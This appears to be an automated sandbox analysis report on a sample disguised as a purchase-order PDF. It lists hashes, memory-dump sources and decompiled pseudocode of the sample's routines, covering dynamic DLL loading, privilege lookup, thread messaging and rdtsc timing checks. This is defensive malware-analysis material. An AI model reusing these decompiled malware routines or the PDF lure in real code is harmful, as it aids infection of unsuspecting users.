                                            • Opcode ID: 53614d389a4b0e734c1ef8e78f1d8f0e5a05ac5ecd7c67f4bfbae246ffd58007
                                            • Instruction ID: 6a8e12ea0998af67df7d92956d9e4e8e2a82d325a8ef63db8223640feddd8ad4
                                            • Opcode Fuzzy Hash: 53614d389a4b0e734c1ef8e78f1d8f0e5a05ac5ecd7c67f4bfbae246ffd58007
                                            • Instruction Fuzzy Hash: 28900225261040030209A5580B08507004A87D5392361C031F1456590CDA2588615122
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 86510f683e50026f2ff427f909fa622982ff60a71d73bb92077b10fa80f5433b
                                            • Instruction ID: d0664938b4b627610867cda98381a5c3fbd4d7db6088264243ce772cf2594d93
                                            • Opcode Fuzzy Hash: 86510f683e50026f2ff427f909fa622982ff60a71d73bb92077b10fa80f5433b
                                            • Instruction Fuzzy Hash: C890022165104502D20571584808617000E87D0382FA1C032A1465595ECE298992A132
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e1f0163112e5d970ca899194931b0e21bb99f4700473826adffa5ab2a1ea4801
                                            • Instruction ID: 68635cf6194e5a819bc7f27dae6e55a8233d9771f7e6f348fcc57e7758f432f2
                                            • Opcode Fuzzy Hash: e1f0163112e5d970ca899194931b0e21bb99f4700473826adffa5ab2a1ea4801
                                            • Instruction Fuzzy Hash: 4A90022165104042424471688C489074009ABE1352761C131A0DD9590DC95D88655666
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 31210f9c7a10b3683191062bfa2d28d6fb57653974a9a52ff4c81106abfe88c5
                                            • Instruction ID: 498febdde1122b397a49238a05d2497e5376e8e3d6bcc96a027ab40b41854676
                                            • Opcode Fuzzy Hash: 31210f9c7a10b3683191062bfa2d28d6fb57653974a9a52ff4c81106abfe88c5
                                            • Instruction Fuzzy Hash: 1E90023125144402D20461584C1870B000987D0343F61C021A15A5595DCA2988516572
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 99d167ccd00724acd3d34bef698ee361e6ab6eb0634e1fa171383a10b6b2fd07
                                            • Instruction ID: 2f364eae17833b2dd3cdb2e37641a1775909623be32f660889babfdf6e876f3a
                                            • Opcode Fuzzy Hash: 99d167ccd00724acd3d34bef698ee361e6ab6eb0634e1fa171383a10b6b2fd07
                                            • Instruction Fuzzy Hash: 0690023125104802D2847158480864B000987D1342FA1C025A0466694DCE198A5977A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 46b7449ba4c251d26737b771e2a35cb1b431c1198fc4e28ec2a6d8299b30a67b
                                            • Instruction ID: f3795e0b5768f6ac5d3145dce9a871b5afde236f78cf2999a0f5cd10cbae0759
                                            • Opcode Fuzzy Hash: 46b7449ba4c251d26737b771e2a35cb1b431c1198fc4e28ec2a6d8299b30a67b
                                            • Instruction Fuzzy Hash: 3090022126184042D30465684C18B07000987D0343F61C125A0595594CCD1988615522
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d394094bdfa34294f6a2c26ddb720c25c8b06abe93bee2d098a83d3bd61e8121
                                            • Instruction ID: 6fc14dbc90c4fe56b43d290e101e9762b2200033b524e88ecc48df5c0d7c318e
                                            • Opcode Fuzzy Hash: d394094bdfa34294f6a2c26ddb720c25c8b06abe93bee2d098a83d3bd61e8121
                                            • Instruction Fuzzy Hash: 8290026139104442D20461584818B070009C7E1342F61C025E14A5594DCA1DCC526127
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 40f49c72e8006d61ae37bc3eea12ddcb47b4ffe9d5e554af899eac628bfcbee8
                                            • Instruction ID: 25810509e9bee23a37bdac82cd78f3f586801eef3d5b752733dbc0c67b34b447
                                            • Opcode Fuzzy Hash: 40f49c72e8006d61ae37bc3eea12ddcb47b4ffe9d5e554af899eac628bfcbee8
                                            • Instruction Fuzzy Hash: A890026125204003420971584818617400E87E0342B61C031E14555D0DC92988916126
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f1c24fab8fe54bc1e9c0f25e8eb5eedbca7bb5e161a239450d70bf9c3dcbb37c
                                            • Instruction ID: 29fe1e1d0f598959f7263f29babfc57dc4f4df6fe7c762a066be2ed0110f281b
                                            • Opcode Fuzzy Hash: f1c24fab8fe54bc1e9c0f25e8eb5eedbca7bb5e161a239450d70bf9c3dcbb37c
                                            • Instruction Fuzzy Hash: B690023125104402D2046598580C647000987E0342F61D021A5465595ECA6988916132
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_9f0000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1ca6555834069b172dce0070f41e0a5edb83f360f4b46bddfd53bb9a0b22b9b0
                                            • Instruction ID: 521415ceea66b936c9568cf4473f56a6041ff9ceaae557320d45aa8a43abb6b8
                                            • Opcode Fuzzy Hash: 1ca6555834069b172dce0070f41e0a5edb83f360f4b46bddfd53bb9a0b22b9b0
                                            • Instruction Fuzzy Hash: 689002312510C802D2146158880874B000987D0342F65C421A4865698DCA9988917122
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E00409AA0(intOrPtr _a4) {
                                            				intOrPtr _v8;
                                            				char _v24;
                                            				char _v284;
                                            				char _v804;
                                            				char _v840;
                                            				void* _t24;
                                            				void* _t31;
                                            				void* _t33;
                                            				void* _t34;
                                            				void* _t39;
                                            				void* _t50;
                                            				intOrPtr _t52;
                                            				void* _t53;
                                            				void* _t54;
                                            				void* _t55;
                                            				void* _t56;
                                            
                                            				_t52 = _a4;
                                            				_t39 = 0; // executed
                                            				_t24 = E00407EA0(_t52,  &_v24); // executed
                                            				_t54 = _t53 + 8;
                                            				if(_t24 != 0) {
                                            					E004080B0( &_v24,  &_v840);
                                            					_t55 = _t54 + 8;
                                            					do {
                                            						E0041BE00( &_v284, 0x104);
                                            						E0041C470( &_v284,  &_v804);
                                            						_t56 = _t55 + 0x10;
                                            						_t50 = 0x4f;
                                            						while(1) {
                                            							_t31 = E00414DE0(E00414D80(_t52, _t50),  &_v284);
                                            							_t56 = _t56 + 0x10;
                                            							if(_t31 != 0) {
                                            								break;
                                            							}
                                            							_t50 = _t50 + 1;
                                            							if(_t50 <= 0x62) {
                                            								continue;
                                            							} else {
                                            							}
                                            							goto L8;
                                            						}
                                            						_t9 = _t52 + 0x14; // 0xffffe055
                                            						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                            						_t39 = 1;
                                            						L8:
                                            						_t33 = E004080E0( &_v24,  &_v840);
                                            						_t55 = _t56 + 8;
                                            					} while (_t33 != 0 && _t39 == 0);
                                            					_t34 = E00408160(_t52,  &_v24); // executed
                                            					if(_t39 == 0) {
                                            						asm("rdtsc");
                                            						asm("rdtsc");
                                            						_v8 = _t34 - 0 + _t34;
                                            						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                            					}
                                            					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                            					_t20 = _t52 + 0x31; // 0x5608758b
                                            					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                            					return 1;
                                            				} else {
                                            					return _t24;
                                            				}
                                            			}



















                                            0x00409aab
                                            0x00409ab3
                                            0x00409ab5
                                            0x00409aba
                                            0x00409abf
                                            0x00409ad2
                                            0x00409ad7
                                            0x00409ae0
                                            0x00409aec
                                            0x00409aff
                                            0x00409b04
                                            0x00409b07
                                            0x00409b10
                                            0x00409b22
                                            0x00409b27
                                            0x00409b2c
                                            0x00000000
                                            0x00000000
                                            0x00409b2e
                                            0x00409b32
                                            0x00000000
                                            0x00000000
                                            0x00409b34
                                            0x00000000
                                            0x00409b32
                                            0x00409b36
                                            0x00409b39
                                            0x00409b3f
                                            0x00409b41
                                            0x00409b4c
                                            0x00409b51
                                            0x00409b54
                                            0x00409b61
                                            0x00409b6c
                                            0x00409b6e
                                            0x00409b74
                                            0x00409b78
                                            0x00409b7b
                                            0x00409b7b
                                            0x00409b82
                                            0x00409b85
                                            0x00409b8a
                                            0x00409b97
                                            0x00409ac6
                                            0x00409ac6
                                            0x00409ac6

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                            • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                            • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                            • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 7 41a620-41a651 call 41af50 RtlAllocateHeap
                                            C-Code - Quality: 100%
                                            			E0041A620(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                            				void* _t10;
                                            				void* _t15;
                                            
                                            				E0041AF50(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                            				_t6 =  &_a8; // 0x414526
                                            				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                            				return _t10;
                                            			}





                                            0x0041a637
                                            0x0041a642
                                            0x0041a64d
                                            0x0041a651

                                            APIs
                                            • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: &EA
                                            • API String ID: 1279760036-1330915590
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 205 408309-40835a call 41be50 call 41c9f0 call 40ace0 call 414e40 214 40835c-40836e PostThreadMessageW 205->214 215 40838e-408392 205->215 216 408370-40838a call 40a470 214->216 217 40838d 214->217 216->217 217->215
                                            C-Code - Quality: 60%
                                            			E00408309(intOrPtr _a4, long _a8) {
                                            				char _v67;
                                            				char _v68;
                                            				void* _t12;
                                            				int _t13;
                                            				long _t21;
                                            				int _t26;
                                            				void* _t29;
                                            				void* _t31;
                                            				void* _t36;
                                            
                                            				asm("cld");
                                            				asm("daa");
                                            				asm("ror byte [edx+0x55], cl");
                                            				_t29 = _t31;
                                            				_v68 = 0;
                                            				E0041BE50( &_v67, 0, 0x3f);
                                            				E0041C9F0( &_v68, 3);
                                            				_t12 = E0040ACE0(_t36, _a4 + 0x1c,  &_v68); // executed
                                            				_t13 = E00414E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                            				_t26 = _t13;
                                            				if(_t26 != 0) {
                                            					_t21 = _a8;
                                            					_t13 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                            					_t38 = _t13;
                                            					if(_t13 == 0) {
                                            						_t13 =  *_t26(_t21, 0x8003, _t29 + (E0040A470(_t38, 1, 8) & 0x000000ff) - 0x40, _t13);
                                            					}
                                            				}
                                            				return _t13;
                                            			}












                                            0x0040830b
                                            0x0040830c
                                            0x0040830e
                                            0x00408311
                                            0x0040831f
                                            0x00408323
                                            0x0040832e
                                            0x0040833e
                                            0x0040834e
                                            0x00408353
                                            0x0040835a
                                            0x0040835d
                                            0x0040836a
                                            0x0040836c
                                            0x0040836e
                                            0x0040838b
                                            0x0040838b
                                            0x0040838d
                                            0x00408392

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: ae1178c7fec324d009f87f0136d07fa944887e8b766dfc85608e804858829a00
                                            • Instruction ID: 4e4273f2f59fc753791dc35edd13c069995cd733613e09d3cc0615af6dac5cdc
                                            • Opcode Fuzzy Hash: ae1178c7fec324d009f87f0136d07fa944887e8b766dfc85608e804858829a00
                                            • Instruction Fuzzy Hash: C501D871A8031877E720A6959C43FFF7B5C6B40B54F08012DFF04BB1C2D6A9690587EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 220 408310-40831f 221 408328-40835a call 41c9f0 call 40ace0 call 414e40 220->221 222 408323 call 41be50 220->222 229 40835c-40836e PostThreadMessageW 221->229 230 40838e-408392 221->230 222->221 231 408370-40838a call 40a470 229->231 232 40838d 229->232 231->232 232->230
                                            C-Code - Quality: 82%
                                            			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                                            				char _v67;
                                            				char _v68;
                                            				void* _t12;
                                            				intOrPtr* _t13;
                                            				int _t14;
                                            				long _t21;
                                            				intOrPtr* _t25;
                                            				void* _t26;
                                            				void* _t30;
                                            
                                            				_t30 = __eflags;
                                            				_v68 = 0;
                                            				E0041BE50( &_v67, 0, 0x3f);
                                            				E0041C9F0( &_v68, 3);
                                            				_t12 = E0040ACE0(_t30, _a4 + 0x1c,  &_v68); // executed
                                            				_t13 = E00414E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                            				_t25 = _t13;
                                            				if(_t25 != 0) {
                                            					_t21 = _a8;
                                            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                            					_t32 = _t14;
                                            					if(_t14 == 0) {
                                            						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                            					}
                                            					return _t14;
                                            				}
                                            				return _t13;
                                            			}












                                            0x00408310
                                            0x0040831f
                                            0x00408323
                                            0x0040832e
                                            0x0040833e
                                            0x0040834e
                                            0x00408353
                                            0x0040835a
                                            0x0040835d
                                            0x0040836a
                                            0x0040836c
                                            0x0040836e
                                            0x0040838b
                                            0x0040838b
                                            0x00000000
                                            0x0040838d
                                            0x00408392

                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                            • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                            • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                            • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 261 40acd5-40acd9 262 40acdb-40ad09 call 41cc40 261->262 263 40ad3c-40ad3e 261->263 269 40ad0b-40ad0e 262->269 270 40ad0f-40ad1d call 41d060 262->270 264 40ad40-40ad43 263->264 265 40ad57-40ad5a 263->265 267 40ad46-40ad54 LdrLoadDll 264->267 267->265 273 40ad2d-40ad39 call 41b490 270->273 274 40ad1f-40ad2a call 41d2e0 270->274 273->263 274->273
                                            C-Code - Quality: 85%
                                            			E0040ACD5(intOrPtr _a8) {
                                            				char _v1;
                                            				struct _EXCEPTION_RECORD _v8;
                                            				struct _OBJDIR_INFORMATION _v12;
                                            				intOrPtr _v16;
                                            				char _v536;
                                            				intOrPtr _t14;
                                            				void* _t19;
                                            				intOrPtr _t21;
                                            				char* _t29;
                                            				char* _t32;
                                            				void* _t35;
                                            				void* _t36;
                                            
                                            				_t29 =  &_v1;
                                            				asm("fbld tword [esi+0x12]");
                                            				if(_t29 < 0) {
                                            					L7:
                                            					__eflags = _t14;
                                            					if(_t14 == 0) {
                                            						LdrLoadDll(0, 0,  &_v8,  &_v12); // executed
                                            						_t14 = _v12;
                                            					}
                                            					return _t14;
                                            				} else {
                                            					asm("repe imul ebp, [esi-0x74aa3aac], 0xffffffec");
                                            					_push(_t29);
                                            					_t29 = _t32;
                                            					_v8 =  &_v536;
                                            					_t19 = E0041CC40( &_v12, 0x104, _a8);
                                            					_t35 = _t32 - 0x214 + 0xc;
                                            					if(_t19 != 0) {
                                            						_t21 = E0041D060(__eflags, _v8);
                                            						_t36 = _t35 + 4;
                                            						__eflags = _t21;
                                            						if(_t21 != 0) {
                                            							E0041D2E0( &_v12, 0);
                                            							_t36 = _t36 + 8;
                                            						}
                                            						_t14 = E0041B490(_v8);
                                            						_v16 = _t14;
                                            						goto L7;
                                            					} else {
                                            						return _t19;
                                            					}
                                            				}
                                            			}















                                            0x0040acd5
                                            0x0040acd6
                                            0x0040acd9
                                            0x0040ad3c
                                            0x0040ad3c
                                            0x0040ad3e
                                            0x0040ad52
                                            0x0040ad54
                                            0x0040ad54
                                            0x0040ad5a
                                            0x0040acdb
                                            0x0040acdb
                                            0x0040ace0
                                            0x0040ace1
                                            0x0040acfc
                                            0x0040acff
                                            0x0040ad04
                                            0x0040ad09
                                            0x0040ad13
                                            0x0040ad18
                                            0x0040ad1b
                                            0x0040ad1d
                                            0x0040ad25
                                            0x0040ad2a
                                            0x0040ad2a
                                            0x0040ad31
                                            0x0040ad39
                                            0x00000000
                                            0x0040ad0b
                                            0x0040ad0e
                                            0x0040ad0e
                                            0x0040ad09

                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 796323f370fa4475754ec7b1a8d10f715a192fc926ee15392a6327c5005b2ba0
                                            • Instruction ID: bdc878ef106f3a56429bda02c633b4ddbb7e2d0d239b4131948f2a420bdd4cde
                                            • Opcode Fuzzy Hash: 796323f370fa4475754ec7b1a8d10f715a192fc926ee15392a6327c5005b2ba0
                                            • Instruction Fuzzy Hash: 07F0BB71D4020DABDF10DB94D841FDAF3799F44308F0046DAED1C97580F1349B588B51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 285 41a7b2-41a7d9 286 41a7df-41a7f4 LookupPrivilegeValueW 285->286 287 41a7da call 41af50 285->287 287->286
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 9d9e9eac524d1612925ac060264e7f27532233a64fa1065fe4f051bb24292a20
                                            • Instruction ID: 87f6bc1613d35dacd9628023668757cfe4edd262aa04486604ed6ac6346b7f8c
                                            • Opcode Fuzzy Hash: 9d9e9eac524d1612925ac060264e7f27532233a64fa1065fe4f051bb24292a20
                                            • Instruction Fuzzy Hash: 5CF0EDB22002146FEB20CF28CC81FE737A8EF48310F008119BA0C97282CA35F8018BF1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 288 41a660-41a691 call 41af50 RtlFreeHeap
                                            C-Code - Quality: 100%
                                            			E0041A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                            				char _t10;
                                            				void* _t15;
                                            
                                            				_t3 = _a4 + 0xc74; // 0xc74
                                            				E0041AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                            				return _t10;
                                            			}





                                            0x0041a66f
                                            0x0041a677
                                            0x0041a68d
                                            0x0041a691

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 80034bffeca0097dba6f70cb36010c0aa27aa1959003ca47bb1f8643967fbc64
                                            • Instruction ID: 9566dbcdc444cc1d826bd2242d7e42ac8f9dc9d32cf1a2720b295ebd7f40422b
                                            • Opcode Fuzzy Hash: 80034bffeca0097dba6f70cb36010c0aa27aa1959003ca47bb1f8643967fbc64
                                            • Instruction Fuzzy Hash: 74E026B91082805FC712EF7498808DBB7A0BF85318700844EF82987B42C230D4168AA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A6A0(intOrPtr _a4, int _a8) {
                                            				void* _t10;
                                            
                                            				_t5 = _a4;
                                            				E0041AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                            				ExitProcess(_a8);
                                            			}




                                            0x0041a6a3
                                            0x0041a6ba
                                            0x0041a6c8

                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
